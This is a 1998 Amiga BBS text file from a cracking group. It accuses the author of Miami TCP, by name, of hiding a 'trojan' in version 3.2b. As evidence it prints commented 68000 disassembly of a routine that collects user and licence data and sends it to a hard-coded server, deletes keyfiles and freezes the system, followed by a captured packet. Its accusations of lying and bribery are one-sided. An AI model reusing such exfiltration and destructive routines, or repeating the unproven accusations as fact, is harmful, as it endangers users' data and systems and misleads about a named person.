___(\З----------------------- ---- --- -- - - - \) IN A WORLD OF DREAMS - IN A WORLD OF PASSION THIS FILE DECIDED TO PASS ONE OF THE LAST AND REAL BULLETIN BOARD SYSTEMS IN CENTRAL EUROPE THE ONLY WAY TO SURVIVE - FAITH! (\ ___ - - --- --- ------- ----------------------З\) /\ / \ ____ ___________ __________ / \\ ____________/ |______ ___\____ \_ __|__/__ \\/ _/ |_ | .--- -| / / _| / \\ | _/ |- ---. | |______________/_______________\ \\_________| |______| | | / \\їeї /________| | | /______________\ | | _________ | | _____________ ___________ _______|_ / | | ___\____ / \ / | | `--------- -| _/ _/_ | \ _/\ |- --------------' |______\ /_____________/______________| \ / \ / sTAFF: \ / \/ SHADOWER,AUTOPSY,EXOCET, LINEBACKER,FURY,NIGHT ASSASSIN HOODLUM WHQ! З DELIRIUM WHQ! З ARCLITE WHQ! З SNEAKERS WHQ! DIGITAL CORRUPTION USHQ! З LIGHTFORCE USHQ! З NUT&BOLT WHQ! ЗSINCE 1992З @BEGIN_FILE_ID.DIZ ________| ____ __|_________|___ dC! | _ \_ |/ |/ |_ _/ ._ | | zS!sE _ | / / / |_ / |/ | |/ | |_ _ \\ |____/ \___/ \___| |__/ |_____| // |Џ \____| \___| \____| \_____| Џ| | З C и R R U P T Ё и N Й 9 9 8 ! З | | | | Amiga Internet Users Security Warning | | Miami has a serious user security breach | |_ and the culprit is Holger Kruse. _| //.11.12.98._____________________.DC`98.\\ @END_FILE_ID.DIZ We decided without further delays that it was about time to give people some ABSOLUTE proof regarding the "rumoured" information sending built into Miami TCP. Every detail discussed below refers ONLY to the distribution archive of Miami 3.2b available from www.nordicglobal.com (exe size 389656 (020)) There has been a lot of talk about this in the past, however until now nobody has provided users with REAL PROOF that will allow EVERY SINGLE Miami user to ask themselves if they find this kind of behaviour in a TCP stack on an Amiga acceptable. It simply CANNOT be denied now. REGARDLESS of the circumstances that trigger the below procedure, it is our belief, and the belief of MANY other Amiga internet users that this procedure is simply no more than a glorified trojan horse, and should even be classified as such in future virus killers. The plain and simple facts ARE that Miami sends your username, IP, DNS, real name (if entered in), registration name, licence number and email address (if possible) to Holgers server. It also signals another process using an interprocess port to delete various keys around the users system if certain conditions are true. Then it kindly locks down your system ensuring that you loose any unsaved work in memory. Digital Corruption now states unequivocally that Holger Kruse has coded into Miami TCP a mechanism which sends to him information on the Miami user, of which he compiles a database. Below is reasonably commented (not to the point of stupidness) resource of Miami's info sending mechanism that Holger Kruse has denied exists on at least one occasion, on another occasion he claimed Miami does not lock up, and yet again he has claimed the deletion of key files does not happen. Also below is a full description of the outgoing data and also an actual captured packet from Miami en route to h1.nordicglobal.com. Some level of understanding of simple Motorola assembly language and workings of the Amiga OS is assumed, but even a less knowledgable user should be able to get the drift of the information contained below. Regarding the key deletion system, various keyfiles are searched for and then a procedure is called which signals another procedure via PutMsg() etc and as a result another procedure carries out the removal of keyfiles. Just before the system lockdown there is a small delay, this is to allow DOS to finish with deleting the keys (after all its being handled by another process) before locking down. If lockdown occurs before DOS has finished deleting , the result would be an invalidated or worse Harddrive. Regarding the lockdown, this is simple to see and cant be denied. Holger calls Disable() and then throws Miami into an unexitable loop. Regarding the actual information sending, its clear to see where the information is compiled and moved into an area ready for sending. Its also clear to see the references to Holgers server and finally the Socket() and SendTo() calls. With such PLAIN evidence that Holger Kruse has been lying and coding in trojan send routines into Miami, it remains to be seen whether he will continue to blame DC in an attempt to divert attention from his code, or whether finally he will admit he offered a bribe to DC to remain quiet, admit he locks down systems, admit he receives clandestine user information, and admit he deletes keys off peoples systems. Time will tell, but once a liar always a liar. In conclusion, the discussion of "is there any such thing in Miami" is now WELL AND TRUELY closed. Anybody even bothering to discuss and question this after seeing the information below is either an idiot, a fanatic or a liar. Holger Kruse, consider yourself exposed. Digital Corruption 98. ----------------------------------------------------------------------------- DECOMPILED CODE SEGMENT FROM MIAMI 3.2B DISTRIBUTION FROM WWW.NORDICGLOBAL.COM STARTING FROM OFFSET $13326 *** NOTE the label endless_loop for proof of lock ups. procedure violate_users_privacy is responsible for sending out the information and we encourage anybody reading this to skip down to that procedure labelled below and read through the commenting. ... nordicglobal: dc.l $1002704C ;704C = port 28748 dc.l $CDA0F929 ;h1.nordicglobal.com dc.l 0 ;205.160.249.41 dc.l 0 Miami.MSG0: dc.b 'Miami:',0,0 Miamikey1.MSG: dc.b 'Miami.key1',0,0 Miamikey2.MSG: dc.b 'Miami.key2',0,0 S.MSG0: dc.b 'S:',0,0 PPPkey.MSG: dc.b 'PPP.key',0 X11.MSG: dc.b 'X11:',0,0 AmiWinkey.MSG: dc.b 'AmiWin.key',0,0 packet_header: dc.b '$MPRNFY1',0,0 ;for remote server logging REPLYTO: dc.b 'REPLYTO',0 ;env. variable to get info from KillKeyFiles: SUB.W #$44,SP MOVEM.L D2/D6/D7/A2/A3/A5/A6,-(SP) SUB.L A1,A1 MOVE.L execbase-DT(A4),A6 JSR _LVOFindTask(A6) MOVE.L D0,A5 JSR _LVOCreateMsgPort(A6) MOVE.L D0,A3 TST.L D0 BEQ lbC013446 MOVEQ #-1,D0 MOVE.L $B8(A5),A2 MOVE.L D0,$B8(A5) LEA Miami.MSG0(PC),A0 MOVE.L dosbase-DT(A4),A6 MOVEQ #-2,D2 MOVE.L A0,D1 JSR _LVOLock(A6) ; get a lock on the Miami: dir. MOVE.L D0,D7 BEQ.S lbC0133CC MOVE.L D7,D1 JSR _LVOCurrentDir(A6) PEA Miamikey1.MSG(PC) ; look for Miami.key1 MOVE.L D0,D6 MOVE.L D7,-(SP) MOVE.L A3,-(SP) PEA $28(SP) BSR lbC013230 ; delete it! PEA Miamikey2.MSG(PC) ; look for Miami.key2 MOVE.L D7,-(SP) MOVE.L A3,-(SP) PEA $38(SP) BSR lbC013230 ; delete it too! LEA $20(SP),SP MOVE.L D6,D1 JSR _LVOCurrentDir(A6) MOVE.L D7,D1 JSR _LVOUnLock(A6) ; release the lock on Miami: lbC0133CC: LEA S.MSG0(PC),A0 MOVE.L A0,D1 JSR _LVOLock(A6) ; get a lock on the S: dir MOVE.L D0,D7 BEQ.S lbC013402 MOVE.L D7,D1 JSR _LVOCurrentDir(A6) PEA PPPkey.MSG(PC) ; look for PPP.key MOVE.L D0,D6 MOVE.L D7,-(SP) MOVE.L A3,-(SP) PEA $28(SP) BSR lbC013230 ; delete it! LEA $10(SP),SP MOVE.L D6,D1 JSR _LVOCurrentDir(A6) MOVE.L D7,D1 JSR _LVOUnLock(A6) lbC013402: LEA X11.MSG(PC),A0 MOVE.L A0,D1 JSR _LVOLock(A6) ; get a lock on X11: dir MOVE.L D0,D7 BEQ.S lbC013438 MOVE.L D7,D1 JSR _LVOCurrentDir(A6) PEA AmiWinkey.MSG(PC) ; look for AmiWin.key MOVE.L D0,D2 MOVE.L D7,-(SP) MOVE.L A3,-(SP) PEA $28(SP) BSR lbC013230 ; delete it! LEA $10(SP),SP MOVE.L D2,D1 JSR _LVOCurrentDir(A6) MOVE.L D7,D1 JSR _LVOUnLock(A6) lbC013438: MOVE.L A2,$B8(A5) MOVE.L execbase-DT(A4),A6 MOVE.L A3,A0 JSR _LVODeleteMsgPort(A6) lbC013446: MOVEM.L (SP)+,D2/D6/D7/A2/A3/A5/A6 :clean up and return ADD.W #$44,SP RTS violate_users_privacy: SUB.W #$100,SP LEA nordicglobal(PC),A0 ;ptr to IP address to send to LEA $F0(SP),A1 ;which is h1.nordicglobal.com MOVE.L (A0)+,(A1)+ ;(CDA0F929=205.160.249.41) MOVE.L (A0)+,(A1)+ MOVE.L (A0)+,(A1)+ MOVE.L (A0)+,(A1)+ LEA packet_header(PC),A0 ;$MPRNFY1 - Miami PiRate ideNtiFY 1 (?) LEA $34(SP),A1 ;probably used so remote server knows MOVE.L (A0)+,(A1)+ ;to log this packet MOVE.L (A0)+,(A1)+ LEA licence_code-DT(A4),A0 ;Hashed Miami licence code LEA $3C(SP),A1 MOVE.L (A0)+,(A1)+ LEA licence_dec-DT(A4),A0 ;20 Digit Miami licence code LEA $40(SP),A1 ;in decimal form MOVE.L (A0)+,(A1)+ MOVE.L (A0)+,(A1)+ MOVE.L (A0)+,(A1)+ MOVE.L (A0)+,(A1)+ MOVE.L (A0)+,(A1)+ LEA reg_name-DT(A4),A0 ;Gets the name of the user from LEA $54(SP),A1 ;the Miami keyfiles information MOVE.L (A0)+,(A1)+ ;Here Miami gets your name and MOVE.L (A0)+,(A1)+ ;adds it into the packet just MOVE.L (A0)+,(A1)+ ;after your licence code MOVE.L (A0)+,(A1)+ LEA TCPIP_name-DT(A4),A0 ;TCP/IP Real Name information LEA $64(SP),A1 ;this part is responsible for MOVE.L (A0)+,(A1)+ ;adding your "real name" setting MOVE.L (A0)+,(A1)+ ;in Miami TCP/IP into the packet MOVE.L (A0)+,(A1)+ ;destinated for Holger MOVE.L (A0)+,(A1)+ LEA TCPIP_user-DT(A4),A0 ;Right here is where your LEA $74(SP),A1 ;username in TCP/IP settings is MOVE.L (A0)+,(A1)+ ;added into the outgoing packet MOVE.L (A0)+,(A1)+ MOVE.L (A0)+,(A1)+ MOVE.L (A0)+,(A1)+ LEA login_name-DT(A4),A0 ;Your ISP login/username is snared LEA $84(SP),A1 ;right here MOVE.L (A0)+,(A1)+ MOVE.L (A0)+,(A1)+ MOVE.L (A0)+,(A1)+ MOVE.L (A0)+,(A1)+ CLR.L -(SP) BSR lbC013590 ;Call a subroutine to get a pointer ADDQ.W #4,SP ;to various current session details MOVE.L D0,A0 ;(IP, DNS etc) LEA 8(A0),A1 LEA $94(SP),A0 ;Adds your current IP address MOVE.L (A1)+,(A0)+ ;into the outgoing information MOVE.L D0,A5 LEA 12(A5),A0 LEA $98(SP),A1 ;Add in your primary DNS server IP MOVE.L (A0)+,(A1)+ LEA REPLYTO(PC),A0 ;Here we get ready to make an OS call MOVEQ #0,D4 ;in order to get information stored MOVEQ #$30,D3 ;(if any) in the env. variable 'REPLYTO' MOVE.L A0,D1 ;which would be your email reply address LEA 3(SP),A0 ;(if your mailer uses this or is set up MOVE.L A0,D2 ;this way) MOVE.L dosbase-DT(A4),A6 JSR _LVOGetVar(A6) ;Calls GetVar() and returns pointer TST.L D0 ;to your info stored in $REPLYTO BLE.S no_email_var ;any replyto email? if not miss some stuff MOVE.L D2,A0 LEA $9C(SP),A1 MOVEQ #$30,D0 BSR lbC018072 ;copies contents of the env.var to the ;outgoing packet area. (copystring proc) BRA.S was_email_var no_email_var: CLR.W $9C(SP) ;zeros first word of area of packet that ;contains replyto if no email var set. was_email_var: MOVE.L miami_verstring(A4),A0 ;adds the version string of the Miami LEA $CC(SP),A1 ;being used into the packet to be MOVEQ #$20,D0 ;sent. Something like: ;$VER: Miami 3.0a (06.03.98) BSR lbC018072 ;call string copy to copy in $VER: MOVEQ #4,D1 MOVE.L $104(SP),D0 MOVE.W D0,$EC(SP) CLR.W $EE(SP) LEA $3C(SP),A5 ;pointer to start of packet data ;to crypt. Why the cryption if this ;is so "above board"? ;doesnt crypt '$MPRNFY1' as thats ;used by the remote server as a ;way of identifying what this packet ;is for (sending your info). crypto: MOVE.W -2(A5),D0 ;Encode the outgoing data using ADDQ.L #1,D1 ;progressive ADD.w ADD.W D0,(A5) ADDQ.L #2,A5 MOVEQ #$5E,D0 CMP.L D0,D1 BLT.S crypto ;continue cryption whilst necessary MOVEQ #2,D0 MOVEQ #0,D2 MOVE.L D0,D1 MOVE.L bsdbase-DT(A4),A6 JSR _LVOSocket(A6) ;Initialize a socket for sending MOVEQ #$5E,D1 MOVEQ #$10,D3 ;length of tolen (sockaddr) ADD.L D1,D1 ;d1=length of data to send ;(which is 188 bytes) LEA $34(SP),A0 ;PTR to data that was initialized above. ;i.e starting with $MPRNFY1 which is ;CLEARLY moved into this memory area ;which is about to be sent to Holger, ;followed by all the other information! LEA $F0(SP),A1 ;PTR to struct sockaddr JSR _LVOSendTo(A6) ;SendTo() - You have now been violated. ;This is the call that sends all the ;information that has been compiled ;to Holgers server. Its clear to see ;that the destination is in fact ;h1.nordicglobal.com and the data ;sent is all the data that was prepared ;above ;PTR to data = $34(SP) = start of info ;PTR to sockaddr = $F0(SP) = clearly ;addressing h1.nordicglobal.com BSR KillKeyFiles ;Lets kil the users keys now MOVEQ #$5A,D1 ADD.L D1,D1 MOVE.L dosbase-DT(A4),A6 ;give DOS time to finish deleting JSR _LVODelay(A6) ;all the keyfiles! BSR cripplesystem endless_loop: BRA.S endless_loop ;And here it is...a nice infinite ;loop after a Disable() ;Net result = system lockup. cripplesystem: MOVE.L A6,-(SP) MOVE.L execbase-DT(A4),A6 JSR _LVODisable(A6) ;disable interrupt processing ;or simply speaking... ;this stops the machine doing anything ;other than run this task, i.e. shuts ;down all system functions, multitasking ;etc...the lot, until an Enable() is ;called. MOVE.L (SP)+,A6 RTS ----------------------------------------------------------------------------- Information on the outgoing packet : The information sent to h1.nordicglobal.com is 188 bytes in length and is made up as follows... Offset $00 : contains the string '$MPRNFY1' ( 8 bytes) Offset $08 : hashed Miami licence code ( 4 bytes) Offset $0C : Miami licence code in decimal form ( 20 bytes) Offset $20 : Name of registered user from keyfiles ( 16 bytes) Offset $30 : Real name from Miami TCP settings ( 16 bytes) Offset $40 : User name from Miami TCP settings ( 16 bytes) Offset $50 : users ISP login ( 16 bytes) Offset $60 : Current IP address (longword form) ( 4 bytes) Offset $64 : Primary DNS server (longword form) ( 4 bytes) Offset $68 : Contents of REPLYTO env. variable ( 48 bytes) Offset $98 : Current Miami $VER: string ( 32 bytes) Offset $B8 : 2 bytes of something ( 2 bytes) Offset $BA : last 2 bytes are blanked ( 2 bytes) TOTAL 188 bytes ----------------------------------------------------------------------------- Below is an actual captured packet (minus some critical information removed) from the infromation send mechanism coded into Miami: Miami Packet: flags =$00000000 itype =$01 ptype =$00 data =$101F77A8 length =$000000D8 INET Packet: ip_v = $45 ip_tos = $00 ip_len = $00D8 ip_id = $91BF ip_off = $0000 ip_ttl = $33 ip_p = $11 ip_sum = $9DF2 ip_src = xxx.xxx.xxx.xxx ; source IP ip_dst = 205.160.249.41 ; 205.160.249.41 (cd a0 f9 29) th_sport = 1029 th_dport = 28748 ; "h1.nordicglobal.com" th_seq = $00C4C8D8 th_ack = $244D5052 th_off = $4E th_flags = $46 th_win = $5931 th_sum = $C96C th_urp = $E01B 00B0 0000: 134B 457B 75AB AEDD E013 1144 4476 7CA9 '.KE{u......DDv|.' 0010: B1DC E414 2C79 9EE6 0054 209B 8A00 FC65 '....,y...T ....e' 0020: 6AD8 6B28 6B8C D8F5 475E BAD2 2D33 A1A2 'j.k(k...G^..-3..' 0030: 13A2 13A2 1411 8385 8385 8385 8385 8385 '................' 0040: 8385 8385 XXXX XXXX D155 D155 D155 D155 '......cU.U.U.U.U' 0050: D155 D155 XXXX XXXX XXXX XXXX 0785 0805 '.U.U._.x........' 0060: 700A E1BE 49D5 CCB5 34D5 DE39 DE39 DE46 'p...I...4..9.9.F' 0070: 4646 68D2 68D2 6952 D155 56E9 BF09 686D 'FFh.h.iR.UV...hm' 0080: D070 5734 BF54 68D8 D0F8 8890 ACE6 F238 '.pW4.Th........8' 0090: 2C58 79C1 DB2E 444E 777C A7DD C805 F83B ',Xy...DNw|.....;' 00A0: 266B 5999 92D1 BBD1 FF40 6FB9 6FB9 6FB9 '&kY......@o.o.o.' INET Options: IAC Packet: 00D8 0000: 4500 00D8 91BF 0000 3311 9DF2 CB0A 5019 'E.......3.....P.' 0010: CB16 7129 0405 704C 00C4 C8D8 244D 5052 '..q)..pL....$MPR' 0020: 4E46 5931 C96C E01B 134B 457B 75AB AEDD 'NFY1.l...KE{u...' 0030: E013 1144 4476 7CA9 B1DC E414 2C79 9EE6 '...DDv|.....,y..' 0040: 0054 209B 8A00 FC65 6AD8 6B28 6B8C D8F5 '.T ....ej.k(k...' 0050: 475E BAD2 2D33 A1A2 13A2 13A2 1411 8385 'G^..-3..........' 0060: 8385 8385 8385 8385 8385 8385 XXXX XXXX '..............cU' 0070: D155 D155 D155 D155 D155 D155 XXXX XXXX '.U.U.U.U.U.U._.x' 0080: XXXX XXXX 0785 0805 700A E1BE 49D5 CCB5 '........p...I...' 0090: 34D5 DE39 DE39 DE46 4646 68D2 68D2 6952 '4..9.9.FFFh.h.iR' 00A0: D155 56E9 BF09 686D D070 5734 BF54 68D8 '.UV...hm.pW4.Th.' 00B0: D0F8 8890 ACE6 F238 2C58 79C1 DB2E 444E '.......8,Xy...DN' 00C0: 777C A7DD C805 F83B 266B 5999 92D1 BBD1 'w|.....;&kY.....' 00D0: FF40 6FB9 6FB9 6FB9 '.@o.o.o.' ----------------------------------------------------------------------------- ________ __________ ________ ________ _____ __ _ __ \_ _ Ќ\ \_ _ Ќ\ \_ _ Ќ\ \_ _ Ќ\ \_ Y Ќ\ __ _ ) _\__Y З\ / Y____/ / Y З\ / Y З\ / ! \ ( / / | \\ // ___/__ / _ \\\___| \\ // _ \ \ __/ / ! /З Y Ќ/ Y \ | /З Y \ \__ \_ \_ ________\_ ________\_ __!_____/ !_ __\_ __!_____/ _/ \_ \/ \/ \/ \/ \/ _/ \ __ _ __________ ________ _____ _ _ __ / Y \_ _ Ќ\ \_ _ Ќ\ \_ Ё Ё \ Y З _ __ / Y __/ / Y \ / |_| \ __ _ З / // _ Ќ\ // | \ // | | \ \ (_ /З Y /З ! /З ! ! \ _) \ \_ __!_____\_ ________\_ _________/ / _) \/ \/ \/З$З (_ \ ___ _ _ ___ / (_ _/ \_ _) \ _) SYSOP: SHADOWER! (_ / \/ \/ HOODLUM WHQ! З DELIRIUM WHQ! З ARCLITE WHQ! З SNEAKERS WHQ! DIGITAL CORRUPTION USHQ! З LIGHTFORCE USHQ! З NUT&BOLT WHQ! ЗSINCE 1992З [AЁRaDDer v3.4 By AЁRcј] ____ Jииии, Эиииии UL: case DATE: 12/11/98 TIME: 22:20 #ииии __ѓииии,____ З _ццииииииииииииииц=_ І __иииииииииииииииииииииm - -ЗЛ .oOo. ЋЗ---:- - - ..... ,ЦиииииииииииииииииЌииииии# І : :... иииииииЦ ииииииии# Аиииии | :......: иииииииии,ииииииииијииии@ _ _ | _ _ ...... _ А4ииииииииииииииииииииА _/\\____ _/\\____ __/\\___ _/\\_____: :_/\\____ ЌА^^Є0иииииииииии@Д (_ .___))(_ ))(_ ____))(_ )) (_ .___)) ЖииииииииииL / І \\ / І \\ /__. \\ / : : \\ :/ І \\ ____ иииииииииии /:. | ///:. : ///:. | ///:.І І // /:. | // \ / ЅииииииииииL \____ // \____ // \____ // \__|__| //: \____ // ___\/___ јиииии`иииии, \// \// \// \// : :[c!]\// \ /\ / ииииии Ќииии# Џ Џ | Џ Џ : : Џ \/ \/ ииииии иииии_ : : : Цииииии Ќиииии ї CЗOЗSЗMЗIЗC >З< TЗRЗAЗNЗCЗE ї : : ї BBS ї ЗFAITH!З иииииии иииии# : : : jииииииQ ииииииИ | .: :.... ииииииии Жиииии# | :.........: .ииииииии |ииииии& _ _ _.__ __ ЦииxCzиии `иииииииЙ |_/__\//\____________________ __ _ иииииииии иииииии#_И : \/ .јииииии^АА' `ЏЌЏ`^Є0ииЙ ~^^ААЏ [ SAD^MULTICHECK Љ 1995-96 GraveDancer/Sad^P! - Reg2: UNREGISTERED ] / \ З/(_____ sPEEEEEEEED aND fRIENDS ONlY! _____)\З / \ fILE pASSED tHE L.E.BBS \ _____ _____ / З\( sPEEEEEEEED aND fRIENDS ONlY! )/З \ / _____ _( /_________ \ _ /---| ____ _____ З-\----)_______/ |______\_ )__ _____ _\ /______ |_____| _ /_\ __/_______/_ _/ _/__ `-------/___/____\ /--\_________/ / /---------З / b l a c k _____ a r t s .. \ / _______\_ )__ _____ _____ \ З-/------- \ _ /__\ _ ))_ _| /_ ___ ---\- Зave'bm З-----/_____/ / /_\ _/_( _/____ `------\______\|___|_\__ )_ /________/